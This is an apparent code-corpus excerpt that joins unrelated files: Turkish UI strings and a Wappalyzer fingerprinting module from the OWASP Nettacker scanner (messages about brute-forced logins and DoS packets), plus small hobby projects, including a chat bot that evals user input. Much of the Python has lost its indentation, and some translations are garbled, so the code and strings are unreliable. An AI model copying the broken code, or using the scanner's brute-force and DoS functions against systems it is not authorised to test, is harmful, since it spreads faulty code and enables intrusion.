"not_last_version": "OWASP Nettacker'ın son sürümünü kullanmıyorsunuz, lütfen güncelleyin.",
"cannot_update": "güncellemeyi kontrol edemezsiniz, lütfen internet bağlantınızı kontrol edin.",
"last_version": "OWASP Nettacker'ın son sürümünü kullanıyorsunuz ...",
"directoy_listing": "dizin girişi {0} bulundu",
"insert_port_message": "lütfen URL yerine -g veya --methods-args anahtarından bağlantı noktası ekleyin",
"http_connection_timeout": "http bağlantısı {0} zaman aşımı!",
"wizard_mode": "sihirbaz modunu başlat",
"directory_file_404": "{1} numaralı bağlantı noktasında {0} için dizin veya dosya bulunamadı",
"open_error": "{0} açılamıyor",
"dir_scan_get": "dir_scan_http_method değeri GET veya HEAD olmalı, varsayılanı "
"GET olarak ayarlanmış olmalıdır.",
"list_methods": "tüm yöntemleri listeler",
"module_args_error": "{0} modül hatalarını alamıyor",
"trying_process": "{3} tarihinde {1} {1} tarihinde {1} {0} tarihinde {4} {5} tarihinde {0} denemeyi",
"domain_found": "alan bulundu: {0}",
"TIME": "ZAMAN",
"CATEGORY": "KATEGORİ",
"module_pattern_404": "{0} desenli bir modül bulamıyor!",
"enter_default": "lütfen {0} girin Varsayılan [{1}]>",
"enter_choices_default": "lütfen {0} girin seçimler [{1}] | Varsayılan [{2}]>",
"all_targets": "hedefler",
"all_thread_numbers": "iş parçacığı numarası",
"out_file": "çıktı dosya adı",
"all_scan_methods": "tarama yöntemleri",
"all_scan_methods_exclude": "dışlamak için tarama yöntemleri",
"all_usernames": "kullanıcı adları",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "zaman aşımı saniye",
"all_ports": "port numaraları",
"all_verbose_level": "ayrıntılı seviye",
"all_socks_proxy": "çorap vekil",
"retries_number": "yeniden deneme sayısı",
"graph": "grafik",
"subdomain_found": "alt alan bulundu: {0}",
"select_profile": "profil seç {0}",
"profile_404": "\"{0}\" profili bulunamadı!",
"waiting": "{0} için bekliyor",
"vulnerable": "{0} için savunmasız",
"target_vulnerable": "{0} hedefi: {1}, {2} için savunmasız!",
"no_vulnerability_found": "hiçbir güvenlik açığı bulunamadı! ({0})",
"Method": "Yöntem",
"API": "API",
"API_options": "API seçenekleri",
"start_API": "API hizmetini başlat",
"API_host": "API ana bilgisayar adresi",
"API_port": "API bağlantı noktası numarası",
"API_debug": "API hata ayıklama modu",
"API_access_key": "API erişim anahtarı",
"white_list_API": "API'ye bağlanmak için beyaz liste ana bilgisayarlarına izin ver",
"define_whie_list": "ile beyaz liste konaklarını tanımlar, (örnek: 127.0.0.1, 192.168.0.1/24, "
"10.0.0.1-10.0.0.255)",
"gen_API_access_log": "API erişim günlüğü oluştur",
"API_access_log_file": "API erişim günlüğü dosya adı",
"API_port_int": "API portu bir tamsayı olmalı!",
"unknown_ip_input": "bilinmeyen giriş türü, kabul edilen türler SINGLE_IPv4, RANGE_IPv4, "
"CIDR_IPv4 şeklindedir.",
"API_key": "* API Anahtarı: {0}",
"ports_int": "portlar tamsayı olmalıdır! (ör. 80, 80, 1080, 80, 1080-1300, 9000, 12000-15000)",
"through_API": "OWASP Nettacker API'sı aracılığıyla",
"API_invalid": "geçersiz API anahtarı",
"unauthorized_IP": "IP'niz yetkili değil",
"not_found": "Bulunamadı!",
"no_subdomain_found": "subdomain_scan: alt alan adı bulunamadı!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: alan adı bulunamadı!",
"browser_session_valid": "tarayıcınızın oturumu geçerli",
"browser_session_killed": "tarayıcı oturumunuz öldürüldü",
"updating_database": "veritabanını güncellemek ...",
"database_connect_fail": "Veritabanına bağlanılamadı!",
"inserting_report_db": "raporu veritabanına eklemek",
"inserting_logs_db": "günlükleri veritabanına eklemek",
"removing_logs_db": "eski günlükleri db'den kaldırma",
"len_subdomain_found": "{0} alt alan bulundu!",
"len_domain_found": "{0} alan (lar) bulundu!",
"phpmyadmin_dir_404": "phpmyadmin dir bulunamadı!",
"DOS_send": "DoS paketlerini {0} adresine göndermek",
"host_up": "{0} doldu! Geri ping atma zamanı {1}",
"host_down": "{0} ping edilemiyor!",
"root_required": "bunun kök olarak çalıştırılması gerekiyor",
"admin_scan_get": "admin_scan_http_method değeri GET veya HEAD olmalı, varsayılanı GET olarak"
" ayarlanmış olmalıdır.",
"telnet_connection_timeout": "{0} ile telnet bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"telnet_connection_failed": "{0} ile telnet bağlantısı: {1} başarısız oldu, tüm adımı atladı {süreç "
"{2}} {2}]! bir sonraki adıma geçmek",
"http_auth_success": "http temel kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_auth_failed": "http temel kimlik doğrulaması {0} tarihinde başarısız oldu: {3} {1} kullanarak: {2}",
"http_form_auth_success": "http formu kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_form_auth_failed": "http formu kimlik doğrulaması {0} için başarısız oldu: {3} {1} kullanarak: {2}",
"http_ntlm_success": "http ntlm kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_ntlm_failed": "http ntlm kimlik doğrulaması {0} tarihinde başarısız oldu: {3} {1} kullanarak: {2}",
"no_response": "hedeften cevap alamıyor",
"category_framework": "kategori: {0}, çerçeveler: {1} bulundu!",
"nothing_found": "{1} 'de {0} tarihinde hiçbir şey bulunamadı!",
"no_auth": "{0} tarihinde hiçbir kimlik bulunamadı: {1}"
}
```
#### File: scan/wappalyzer/engine.py
```python
import os
import json
import re
import pkg_resources
import requests
from bs4 import BeautifulSoup
import threading
import string
import random
import time
import socket
import socks
from core.alert import *
from core.targets import target_type
from core.targets import target_to_host
from core.load_modules import load_file_path
from lib.socks_resolver.engine import getaddrinfo
from core._time import now
from core.log import __log_into_file
from core.compatible import version
def extra_requirements_dict():
return {}
def _parse_webpage(target, timeout_sec, language, retries, socks_proxy, scan_cmd, scan_id):
webpage = {}
tries = 0
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
                                    password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
    # retry the request up to `retries` times before giving up
    while tries < retries:
        try:
            if timeout_sec is not None:
                response = requests.get(target, timeout=timeout_sec)
            else:
                response = requests.get(target)
            webpage['url'] = response.url
            webpage['headers'] = response.headers
            webpage['response'] = response.text
            webpage['html'] = BeautifulSoup(response.text, 'html.parser')
            webpage['scripts'] = [script['src']
                                  for script in webpage['html'].findAll('script', src=True)]
            webpage['metatags'] = {meta['name'].lower(): meta['content']
                                   for meta in webpage['html'].findAll('meta', attrs=dict(name=True, content=True))}
            return webpage
        except Exception:
            tries += 1
    info(messages(language, "no_response"))
    return None
def _prepare_app(app):
for key in ['url', 'html', 'script', 'implies']:
try:
value = app[key]
except KeyError:
app[key] = []
else:
if not isinstance(value, list):
app[key] = [value]
for key in ['headers', 'meta']:
try:
value = app[key]
except KeyError:
app[key] = {}
obj = app['meta']
if not isinstance(obj, dict):
app['meta'] = {'generator': obj}
for key in ['headers', 'meta']:
obj = app[key]
app[key] = {k.lower(): v for k, v in obj.items()}
for key in ['url', 'html', 'script']:
app[key] = [_prepare_pattern(pattern) for pattern in app[key]]
for key in ['headers', 'meta']:
obj = app[key]
for name, pattern in obj.items():
obj[name] = _prepare_pattern(obj[name])
def _prepare_pattern(pattern):
regex, _, rest = pattern.partition('\\;')
try:
return re.compile(regex, re.I)
except re.error as e:
# regex that never matches:
# http://stackoverflow.com/a/1845097/413622
return re.compile(r'(?!x)x')
def _has_app(app, webpage):
try:
for regex in app['url']:
if regex.search(webpage['url']):
return True
for name, regex in app['headers'].items():
if name in webpage['headers']:
content = webpage['headers'][name]
if regex.search(content):
return True
for regex in app['script']:
for script in webpage['scripts']:
if regex.search(script):
return True
for name, regex in app['meta'].items():
if name in webpage['metatags']:
content = webpage['metatags'][name]
if regex.search(content):
return True
for regex in app['html']:
if regex.search(webpage['response']):
return True
except:
pass
def _get_implied_apps(detected_apps, apps1):
def __get_implied_apps(detect, apps):
_implied_apps = set()
for detected in detect:
try:
_implied_apps.update(set(apps[detected]['implies']))
except KeyError:
pass
return _implied_apps
implied_apps = __get_implied_apps(detected_apps, apps1)
all_implied_apps = set()
while not all_implied_apps.issuperset(implied_apps):
all_implied_apps.update(implied_apps)
implied_apps = __get_implied_apps(all_implied_apps, apps1)
return all_implied_apps
def analyze(target, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, retries,
socks_proxy, scan_id, scan_cmd):
webpage = _parse_webpage(
target, timeout_sec, language, retries, socks_proxy, scan_cmd, scan_id)
    obj = json.loads(pkg_resources.resource_string(__name__, "apps.json").decode()
                     if version() == 3 else pkg_resources.resource_string(__name__, "apps.json"))
apps = obj['apps']
detected = []
for app_name, app in apps.items():
_prepare_app(app)
if _has_app(app, webpage):
detected.append(app_name)
detected = set(detected).union(_get_implied_apps(detected, apps))
category_wise = {}
for app_name in detected:
cats = apps[app_name]['cats']
for cat in cats:
category_wise[app_name] = obj['categories'][str(cat)]['name']
inv_map = {}
for k, v in category_wise.items():
inv_map[v] = inv_map.get(v, [])
inv_map[v].append(k)
for x in inv_map.items():
info(messages(language, "category_framework").format(
x[0], ', '.join(x[1])))
data = json.dumps(
{'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wappalyzer_scan',
'DESCRIPTION': x[0] + ': ' + ', '.join(x[1]), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id,
'SCAN_CMD': scan_cmd})
__log_into_file(log_in_file, 'a', data, language)
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
    if target_type(target) in ('SINGLE_IPv4', 'DOMAIN', 'HTTP', 'SINGLE_IPv6'):
threads = []
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
total_req = 8000
if target_type(target) != "HTTP":
target = 'http://' + target
t = threading.Thread(target=analyze,
args=(
target, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, retries,
socks_proxy, scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target),
"", 'dir_scan'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
break
# wait for threads
kill_switch = 0
        kill_time = int(
            timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
                if threading.activeCount() == 1 or kill_switch == kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
        if thread_write == 1:
info(messages(language, "nothing_found").format(
target, "wappalyzer_scan"))
            if verbose_level != 0:
data = json.dumps({'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wappalyzer_scan',
'DESCRIPTION': messages(language, "not_found"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id,
'SCAN_CMD': scan_cmd})
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(
'wappalyzer_scan', target))
``` |
{
"source": "0x4445565A/instacodes-sublimetext-plugin",
"score": 3
} |
#### File: 0x4445565A/instacodes-sublimetext-plugin/instacodes.py
```python
import sublime, sublime_plugin, re, urllib.parse, webbrowser
class SelectionToInstacodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()[0]
if not sel.empty():
selection = urllib.parse.quote_plus(self.view.substr(sel))
        syntax = re.search(r'/.*/', self.view.settings().get('syntax')).group(0).replace('/', '')
sendToBrowser(selection, syntax)
else:
sublime.error_message('No code was selected. InstaCod.es post failed.')
class FileToInstacodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
selection = urllib.parse.quote_plus(self.view.substr(self.view.visible_region()))
        syntax = re.search(r'/.*/', self.view.settings().get('syntax')).group(0).replace('/', '')
sendToBrowser(selection, syntax)
def sendToBrowser(code, syntax):
webbrowser.open('http://instaco.de/?post_code=' + code + '&post_lang=' + syntax)
``` |
{
"source": "0x4448/advent-of-code",
"score": 4
} |
#### File: advent-of-code/2015/day01.py
```python
def get_floor(chars: str) -> int:
floor = 0
for char in chars:
if char == "(":
floor += 1
elif char == ")":
floor -= 1
return floor
def get_basement_position(chars: str) -> int:
floor = 0
for n, char in enumerate(chars):
if char == "(":
floor += 1
elif char == ")":
floor -= 1
if floor == -1:
return n + 1
```
#### File: advent-of-code/2015/day02.py
```python
def get_area(dimensions: str) -> int:
dimensions = dimensions.split("\n")
total = 0
for dim in dimensions:
l, w, h = sorted([int(n) for n in dim.split("x")])
# area of smallest side
total += l * w
total += 2 * l * w
total += 2 * w * h
total += 2 * l * h
return total
def get_length(dimensions: str) -> int:
dimensions = dimensions.split("\n")
total = 0
for dim in dimensions:
l, w, h = sorted([int(n) for n in dim.split("x")])
# perimeter of smallest face
total += 2 * l + 2 * w
# volume
total += l * w * h
return total
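# Sanity-check values from the AoC 2015 day 2 puzzle statement (taken from
# the puzzle text, not computed here):
#   get_area("2x3x4") == 58,   get_area("1x1x10") == 43
#   get_length("2x3x4") == 34, get_length("1x1x10") == 14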
```
#### File: advent-of-code/2015/day04.py
```python
import hashlib
def md5(s: str) -> str:
h = hashlib.md5()
h.update(s.encode("utf-8"))
return h.hexdigest()
def mine_coin(key: str) -> int:
count = 1
while not md5(key + str(count)).startswith("000000"):
count += 1
return count
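# Usage sketch (hypothetical key): mine_coin("abcdef") returns the lowest
# positive integer n such that md5("abcdef" + str(n)) starts with "000000"
# (the six-leading-zeros variant of AoC 2015 day 4).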
``` |
{
"source": "0x444d4d/SCC-assembler",
"score": 3
} |
#### File: SCC-assembler/SCC/SCCUtils.py
```python
import csv
import re
from SCCDicts import *
def writeList2File(fileName, list, append=0):
mode = ('w', 'a')[append]
with open(fileName, mode) as file:
for item in list:
file.write(f'{item}\n')
def isRegister(operand):
return registers[operand]
def isImm(operand):
if (operand[0] == 'b'):
if (len(operand[1:]) > 8):
raise Exception(f'Operand too large. Must be under 8 bits. Received {operand}')
else:
return operand[1:]
elif int(operand) > 255:
raise Exception(f'Operand too large. Must be under 8 bits. Received {operand}')
return format(int(operand), '08b')
def isOther(operand):
    in_prep_rules = operand in prep_rules
    # the duplicate-use check must run before returning, otherwise it is unreachable
    if in_prep_rules and operand in directions:
        raise Exception(f'Operand {operand} used as an address tag and preprocessor rule')
    if in_prep_rules:
        return opType(prep_rules[operand])
    if operand in directions:
        print(f'{operand} : {directions[operand]}')
        return directions[operand]
    else:
        raise Exception(f'Operand not recognized. Received {operand}')
def isAddr(operand):
address = re.search(r'([0-9]+)', operand).group()
if re.match(r'^io\([0-9]+\)',operand):
return '000000' + format(int(address), '02b')
if re.match(r'^int\([0-9]+\)',operand):
return '00001' + format(int(address), '03b')
if re.match(r'^data\([0-9]+\)',operand):
return '1' + format(int(address), '07b')
def opType(operand):
regexps = [r'(?:R(?:1[0-5]|[1-9])|zero)', r'b?[0-9]+', r'(io|data|int)\(([0-9]+)\)', r'[:a-zA-Z0-9]']
functions = [isRegister, isImm, isAddr, isOther] # This is a function list
index = -1
for regex in regexps:
index += 1
if re.match(regex, operand):
# Now a function is applied to the item to turn it into binary code
return functions[index](operand)
raise Exception(f'Operand {operand} is not valid')
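# A dispatch sketch (illustrative only; `registers`, `prep_rules` and
# `directions` are defined in SCCDicts, so register encodings depend on
# those tables):
#   opType('b1010')   -> isImm('b1010')    -> '1010'
#   opType('42')      -> isImm('42')       -> '00101010'
#   opType('data(5)') -> isAddr('data(5)') -> '10000101'
#   opType('R3')      -> isRegister('R3')  (looked up in `registers`)
#   opType('loop')    -> isOther('loop')   (preprocessor rule or address tag)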
def operateFile(file, func):
result = func(file)
file.seek(0)
return result
def translate(file):
#Transform assembly instructions into machine code.
result = []
for line in file:
operation = ''
opcode = ''
line = line.strip('\n')
items = line.split(' ')
items = list(filter(None, items))
if items[0] in opcodeDict:
operation = rules[items[0]]
opcode = opcodeDict[items[0]]
operation = re.sub(r'O+', opcode, operation)
items.remove(items[0])
s = 'X'
for item in items:
operand = opType(item)
occurences = len(re.search(s+'+', operation).group())
if occurences < len(operand):
operand = operand[len(operand) - occurences:]
operation = re.sub(s+'+', operand, operation)
s = chr((ord(s) + 1))
result.append(str(operation))
elif items[0][0] == ':':
continue
else:
raise Exception(f'ERROR: {line.split()[0]} in not a valid opcode')
return result
def resolveDirections(file):
instructionDir = 0
for line in file:
match = re.search(r'^:([a-zA-Z0-9_-]+)', line)
if match:
directions[match.group(1)] = format(instructionDir, '010b')
else:
instructionDir += 1
def strip_input(out_file, csvFile):
#with open(path, 'r') as csvFile:
lines = csvFile.read().splitlines()
code_section = preprocess(lines)
for line in lines[code_section:]:
line = line.strip()
if line:
if re.match(r'^#', line): #If line is a comment ignore it
continue
elif re.search(r'#', line): #Strip comment ater instruction
index = re.search(r'#', line).start()
out_file.write(line[0:index]+'\n')
else: #Add instruction to virtual file
out_file.write(line+'\n')
#Make file ready to be read again
out_file.seek(0)
def read_mem_file( input_file ):
#assembly_code will contain the lines of assembly code to translate
with open(input_file, 'r') as infile:
return_code = []
assembly_code = csv.DictReader(infile, delimiter = ' ',
fieldnames = ["opcode", "op1", "op2"],
restval = None,
quoting = csv.QUOTE_NONE)
for instruction in assembly_code:
opc, op1, op2 = instruction["opcode"], instruction["op1"], instruction["op2"]
return_code.append({"opcode":opc, "op1":op1, "op2":op2})
return return_code
def preprocess( lines ):
begining = 0
for line in lines:
if line != '.code':
match = re.search(r'^use ([a-zA-Z0-9]+) as ([a-zA-Z0-9\(\)]+$)',line)
if match is not None:
prep_rules[match.group(1)] = match.group(2)
begining += 1
else:
return begining + 1
return None
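# A sketch of the directive syntax preprocess() consumes (hypothetical lines):
#   use counter as R3
#   use led as io(2)
#   .code
# After this, prep_rules == {'counter': 'R3', 'led': 'io(2)'} and the return
# value is the index just past the '.code' marker (assuming only `use`
# directives precede it).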
``` |
{
"source": "0x464c4f/portainer_stack_management",
"score": 3
} |
#### File: portainer_stack_management/portainer_management/portainer_management.py
```python
import portainer_api
from portainer_api.api.auth_api import AuthApi
from portainer_api.models.stack_list_response import StackListResponse
import yaml
import base64
import json
import sys
import os
from portainer_api.rest import ApiException
class Portainer_Management:
def __init__(self, username:str, password:str) -> None:
self.configuration = portainer_api.Configuration()
        self.configuration.host = os.environ["PORTAINER_URL"]
self.configuration.verify_ssl = True
self.username = username
self.password = password
self.client = portainer_api.ApiClient(self.configuration)
authapi = portainer_api.AuthApi(self.client)
self.access_token = self.authenticate(authapi, username, password)
def authenticate(self, authapi:AuthApi, username, password):
try:
auth_body = portainer_api.AuthenticateUserRequest(username=self.username,password=self.password)
api_response = authapi.authenticate_user(auth_body)
access_token = api_response.jwt
self.client.set_default_header(header_name="Authorization", header_value=access_token)
print("Successfully authenticated")
except ApiException as e:
access_token = ""
print("Exception when calling api: %s\n" % e)
return access_token
def does_secret_already_exist(self,secret_name,header):
secret_exists = False
try:
response = self.client.request(method="GET",url=self.configuration.host+"/endpoints/1/docker/secrets",headers=header)
data = json.loads(response.data)
for secret in data:
if secret["Spec"]["Name"]==secret_name:
secret_exists = secret["ID"]
except ApiException as e:
print(f"Something wrong in the stack already exists call:{e}")
return secret_exists
def does_stack_already_exist(self,stack_name):
try:
stack_api_client = portainer_api.StacksApi(self.client)
all_stacks:StackListResponse = stack_api_client.stack_list()
stack_exists = False
for stack in all_stacks:
if stack_name==stack["Name"]:
stack_exists = stack["Id"]
return stack_exists
except ApiException as e:
print(f"Something wrong in the stack already exists call:{e}")
    def create_or_update_stack_from_compose_file(self, compose_filename, stack_name, swarm_id=os.environ.get("SWARM_ID"), endpoint_id=1):
### include path to compose file if not in the same folder
try:
stack_api_client = portainer_api.StacksApi(self.client)
stack_api_client.stack_list()
with open(compose_filename) as file:
file_loaded = yaml.load(file, Loader=yaml.FullLoader)
yaml_string = yaml.dump(file_loaded,indent=2, width=10)
stack_id =self.does_stack_already_exist(stack_name=stack_name)
if stack_id:
body_stack_update = portainer_api.StackUpdateRequest(stack_file_content=yaml_string)
response = stack_api_client.stack_update(id=stack_id,body=body_stack_update,endpoint_id=endpoint_id)
print(f"Stack {stack_name} updated successfully")
print(response)
else:
body_test_stack=portainer_api.StackCreateRequest(name=stack_name,swarm_id=swarm_id,stack_file_content=yaml_string)
response = stack_api_client.stack_create(type=1,method="string",endpoint_id=endpoint_id,body=body_test_stack)
print(f"Stack {stack_name} created successfully")
print(response)
except ApiException as e:
print("Exception when calling api: %s\n" % e)
    def remove_docker_secret(self):
        # stub, not implemented yet
        return 0
def create_or_update_docker_secret(self,secret_name:str,secret_value:str,labels={}):
secret_value_encoded = base64.b64encode(secret_value.encode("ascii")).decode("ascii")
body = {"Name":secret_name,"Data":secret_value_encoded,"Labels":labels}
header = {"Authorization": self.access_token}
secret_id = self.does_secret_already_exist(secret_name,header)
# Remove secret if it already exists - this is necessary to update it
if secret_id:
print(f"Secret {secret_name} exists already - is getting updated")
try:
response = self.client.request(method="DELETE",url=self.configuration.host+"/endpoints/1/docker/secrets/"+str(secret_id),headers=header)
if response.status == 204:
print(f"Secret {secret_name} successfully deleted")
except ApiException as e:
print("Exception when calling api: %s\n" % e)
# Create secret
try:
response = self.client.request(method="POST",url=self.configuration.host+"/endpoints/1/docker/secrets/create",body=body,headers=header)
if response.status == 200:
print(f"Secret {secret_name} successfully created")
except ApiException as e:
print("Exception when calling api: %s\n" % e)
# if __name__ == "__main__":
#     If run as a script it will create / update the specified stack
#     api = Portainer_Management(username="user", password="pass")  # placeholder credentials
#     Create or update secret:
#     api.create_or_update_docker_secret("super_secret", "leeet")
#     Create or update stack example:
#     api.create_or_update_stack_from_compose_file(compose_filename=compose_filename, stack_name=stack_name)
``` |
{
"source": "0x4849/cmput366",
"score": 3
} |
#### File: cmput366/Assignment3MountainCar/plot.py
```python
import sys
from numpy import *
from pylab import *
from mpl_toolkits.mplot3d import Axes3D
def main():
    x1steps = x2steps = 50
x1range = linspace(-1.2, 0.5, x1steps)
x2range = linspace(-0.07, 0.07, x2steps)
y = loadtxt(sys.argv[1])
fig = figure()
ax = Axes3D(fig)
x1,x2 = meshgrid(x1range,x2range)
ax.plot_surface(x1, x2, y.T, cstride=1, rstride=1, cmap=cm.jet)
ax.set_xlabel('position')
ax.set_ylabel('velocity')
ax.set_zlabel('$max_a Q(s,a)$')
savefig("plot.pdf", bbox_inches='tight')
if __name__ == '__main__':
main()
show()
``` |
{
"source": "0x486F626F/bril",
"score": 2
} |
#### File: bril/bril2arm64/codegen.py
```python
def func_header(funcname):
print('\t.global %s' % funcname)
print('\t.type %s, %%function' % funcname)
print('%s:' % funcname)
def push_stack(reg):
print('\tstr %s, [sp, -0x10]!' % reg)
def pop_stack(reg):
print('\tldr %s, [sp], 0x10' % reg)
def store_stack(value, offset):
print('\tmov x8, %d' % value)
print('\tstr x8, [fp, %s]' % str(hex(offset)))
def binary_oprand(oprand, offdst, offsrc1, offsrc2):
print('\tldr x8, [fp, %s]' % str(hex(offsrc1)))
print('\tldr x9, [fp, %s]' % str(hex(offsrc2)))
print('\t%s x8, x8, x9' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
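# For illustration, binary_oprand('add', -0x10, -0x18, -0x20) prints:
#     ldr x8, [fp, -0x18]
#     ldr x9, [fp, -0x20]
#     add x8, x8, x9
#     str x8, [fp, -0x10]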
def copy_stack(offdst, offsrc):
print('\tldr x8, [fp, %s]' % str(hex(offsrc)))
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def comparison(oprand, offdst, offsrc1, offsrc2):
print('\tldr x8, [fp, %s]' % str(hex(offsrc1)))
print('\tldr x9, [fp, %s]' % str(hex(offsrc2)))
print('\tcmp x8, x9')
print('\tcset x8, %s' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def unary_oprand(oprand, offdst, offsrc):
print('\tldr x8, [fp, %s]' % str(hex(offsrc)))
print('\t%s x8, x8' % oprand)
print('\tstr x8, [fp, %s]' % str(hex(offdst)))
def jmp(label):
print('\tb %s' % label)
def ret(funcname):
print('\tb %s_ret' % funcname)
def br(offset, label1, label2):
print('\tldr x8, [fp, %s]' % str(hex(offset)))
print('\tcbnz x8, %s' % label1)
print('\tb %s' % label2)
def printint(offset):
print('\tadr x0, fmtld')
print('\tldr x1, [fp, %s]' % str(hex(offset)))
print('\tbl printf')
def printbool(offset):
print('\tldr x1, [fp, %s]' % str(hex(offset)))
print('\tbl printbool')
def printstr(label):
print('\tadr x0, %s' % label)
print('\tbl printf')
def printfooter():
print('''
.global printbool
printbool:
cbz x1, printboolfalse
adr x0, strtrue
b printboolendif
printboolfalse:
adr x0, strfalse
printboolendif:
bl printf
ret lr
.data
fmtld: .string "%ld"
strtrue: .string "true"
strfalse: .string "false"
strspace: .string " "
strnewline: .string "\\n"''')
``` |
{
"source": "0x48piraj/DomRadar",
"score": 3
} |
#### File: DomRadar/utils/avail.py
```python
import sys
import whois
def is_available(domain):
    try:
        whois.whois(domain)
        return False
    except KeyboardInterrupt:
        # KeyboardInterrupt is not an Exception subclass, so catch it explicitly
        sys.exit()
    except Exception:
        # a failed whois lookup is treated as an available domain
        return domain
```
#### File: DomRadar/utils/ds.py
```python
import os, glob
import os.path as path
import pathlib
ROOT_DIR = pathlib.Path(__file__).parents[1].joinpath('datasets')
def load_all():
datasets = ROOT_DIR.rglob('*.txt')
_all = []
for dataset in datasets:
words = open(dataset, 'r').read().splitlines()
for word in words:
_all.append(word)
return _all
def load_dataset(directory):
datasets = ROOT_DIR.joinpath(directory).rglob('*.txt')
_all = []
for dataset in datasets:
words = open(dataset, 'r').read().splitlines()
for word in words:
_all.append(word)
return _all
``` |
{
"source": "0x49D1/dfuse_python_rest_api",
"score": 3
} |
#### File: dfuse_python_rest_api/dfuse_api/issue_token.py
```python
import requests
import redis
import json
import time
redis_db = redis.StrictRedis(host="localhost", port=6379, db=0)
def get_token(api_key):
global redis_db
token = redis_db.get(f'get_token{api_key}')
if token is None or token == '':
print("Getting token from auth.dfuse.io")
response = requests.post(
"https://auth.dfuse.io/v1/auth/issue", json={"api_key": f"{api_key}"})
token = response.text
redis_db.set(f'get_token{api_key}', token, ex=(json.loads(token)["expires_at"] - int(time.time()) - 60*60)) # get the real expiration and "minus one more hour"
return json.loads(token)
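# Caching sketch: the redis TTL is expires_at - now - 3600, so the cached
# token is evicted an hour before dfuse's own expiry and the next call
# re-issues a fresh one (the api_key below is a placeholder, as noted).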
# if __name__ == "__main__":
# token = get_token("server_test_key_here")
# print(token)
``` |
{
"source": "0x4aK/TSBot",
"score": 2
} |
#### File: TSBot/examples/command_checks.py
```python
from __future__ import annotations
import asyncio
from tsbot import TSBot, commands
from tsbot.exceptions import TSPermissionError
bot = TSBot(
username="USERNAME",
password="PASSWORD",
address="ADDRESS",
)
def allow_only_uids(*uid: str):
"""Checks for UIDs. If uid not in given list, raise TSPermissionError"""
async def check_uid(bot: TSBot, ctx: dict[str, str], *args: str, **kwargs: str) -> None:
if ctx.get("invokeruid") not in uid:
raise TSPermissionError("User not allowed to run this command")
return check_uid
@commands.add_check(allow_only_uids("v8t+Jw6+qNDl1KHuDfS7zVjKSws="))
@bot.command("eval")
async def eval_(bot: TSBot, ctx: dict[str, str]) -> None:
try:
response = eval(ctx["invoker_removed"])
except Exception as e:
response = f"{e.__class__.__name__}: {e}"
await bot.respond(ctx, response)
asyncio.run(bot.run())
```
#### File: TSBot/examples/simple_example.py
```python
from __future__ import annotations
import asyncio
from tsbot import TSBot, events
from tsbot.query import query
bot = TSBot(
username="USERNAME",
password="PASSWORD",
address="ADDRESS",
)
@bot.command("hello")
async def hello_world(bot: TSBot, ctx: dict[str, str]):
await bot.respond(ctx, "Hello World!")
@bot.on("cliententerview")
async def poke_on_enter(bot: TSBot, event: events.TSEvent):
poke_query = query("clientpoke").params(clid=event.ctx["clid"], msg="Welcome to the server!")
await bot.send(poke_query)
asyncio.run(bot.run())
```
#### File: tsbot/extensions/bot_info.py
```python
from __future__ import annotations
import logging
from typing import TYPE_CHECKING
from tsbot.extensions import extension
if TYPE_CHECKING:
from tsbot.bot import TSBot
logger = logging.getLogger(__name__)
class BotInfo(extension.Extension):
def __init__(self, parent: TSBot) -> None:
super().__init__(parent)
self.clid: str
self.database_id: str
self.login_name: str
self.nickname: str
self.unique_identifier: str
def __repr__(self) -> str:
return f"{self.__class__.__qualname__}(clid={self.clid}, nickname={self.nickname}, database_id={self.database_id}, unique_identifier={self.unique_identifier})"
async def run(self):
await self.update()
async def update(self):
response = await self.parent.send_raw("whoami")
self.clid = response.first["client_id"]
self.database_id = response.first["client_database_id"]
self.login_name = response.first["client_login_name"]
self.nickname = response.first["client_nickname"]
self.unique_identifier = response.first["client_unique_identifier"]
```
